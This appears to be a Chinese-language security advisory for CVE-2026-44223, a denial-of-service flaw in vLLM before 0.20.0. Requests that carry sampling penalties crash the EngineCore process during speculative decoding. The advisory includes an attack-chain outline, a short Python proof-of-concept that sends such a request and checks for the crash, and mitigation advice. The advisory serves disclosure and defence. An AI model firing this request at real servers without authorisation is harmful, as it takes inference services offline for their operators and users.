CVE-2026-44223 vLLM推理引擎拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-44223

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

vLLM

漏洞概述

vLLM是一个用于大型语言模型推理和服务的高性能引擎。在0.20.0版本之前，该软件在推测解码功能中存在严重缺陷。当批处理中的请求使用了采样惩罚参数（如repetition_penalty）时，extract_hidden_states提议器会在首次解码后返回维度错误的张量。这会触发RuntimeError，直接导致EngineCore进程崩溃。攻击者仅需发送一个包含惩罚参数的请求，即可利用此漏洞造成服务器拒绝服务。

技术细节

该漏洞根源在于vLLM在处理推测解码请求时的张量形状管理逻辑存在缺陷。具体而言，在0.20.0之前的版本中，当批处理请求中包含任何使用了采样惩罚参数（例如repetition_penalty、frequency_penalty或presence_penalty）的请求时，系统内部的extract_hidden_states提议器在完成首次解码步骤后，未能正确计算或维护输出张量的维度。这导致返回的张量形状与下游组件期望的形状不匹配，进而触发了RuntimeError运行时错误。由于缺乏足够的异常捕获机制，该错误直接导致负责模型推理的EngineCore核心进程崩溃终止。攻击者无需高权限，仅需通过网络发送构造好的恶意API请求即可触发该漏洞，造成服务器拒绝服务，严重影响服务的可用性。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行受影响版本的vLLM服务（版本 < 0.20.0）。

STEP 2

构造请求

攻击者准备一个包含采样惩罚参数（如repetition_penalty）的恶意API请求。

STEP 3

发送请求

攻击者将该请求发送到vLLM服务器的推理接口。

STEP 4

触发漏洞

服务器处理请求时，extract_hidden_states组件返回形状错误的张量，触发RuntimeError。

STEP 5

达成拒绝服务

EngineCore进程因异常崩溃，导致推理服务不可用，达成DoS攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# PoC for CVE-2026-44223
# Target: vLLM server versions < 0.20.0
# Description: This script sends a request with a repetition_penalty parameter
# to trigger the tensor shape mismatch bug in the speculative decoding proposer.

def check_vulnerability(target_url):
    headers = {"Content-Type": "application/json"}
    endpoint = f"{target_url}/v1/completions"
    
    # Payload containing the sampling penalty parameter that triggers the crash
    payload = {
        "model": "meta-llama/Llama-2-7b-chat-hf",  # Example model name
        "prompt": "Explain this vulnerability.",
        "max_tokens": 50,
        # The presence of 'repetition_penalty' triggers the incorrect tensor shape
        "repetition_penalty": 1.1
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, headers=headers, data=json.dumps(payload), timeout=10)
        
        # If the server crashes, the connection might be reset or return a 500 error
        if response.status_code == 500 or response.status_code == 502:
            print("[+] Potential vulnerability triggered! Server returned error code: {}".format(response.status_code))
        elif "RuntimeError" in response.text or "Internal Server Error" in response.text:
            print("[+] Vulnerability likely triggered. RuntimeError detected in response.")
        else:
            print("[-] Request completed. Server might be patched or not vulnerable.")
            print("Response status:", response.status_code)
            
    except requests.exceptions.ConnectionError:
        print("[+] Connection error. The EngineCore process may have crashed (DoS).")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8000"
    check_vulnerability(target)

影响范围

vLLM < 0.20.0

防御指南

临时缓解措施

建议立即将vLLM组件升级到0.20.0或更高版本以彻底修复此漏洞。如果无法立即升级，建议通过防火墙或安全组限制对vLLM服务端口的网络访问，仅允许可信的内部IP地址调用API。此外，可以部署进程监控脚本，实时检测EngineCore进程的健康状态，一旦发现崩溃尝试自动恢复服务以最小化业务影响。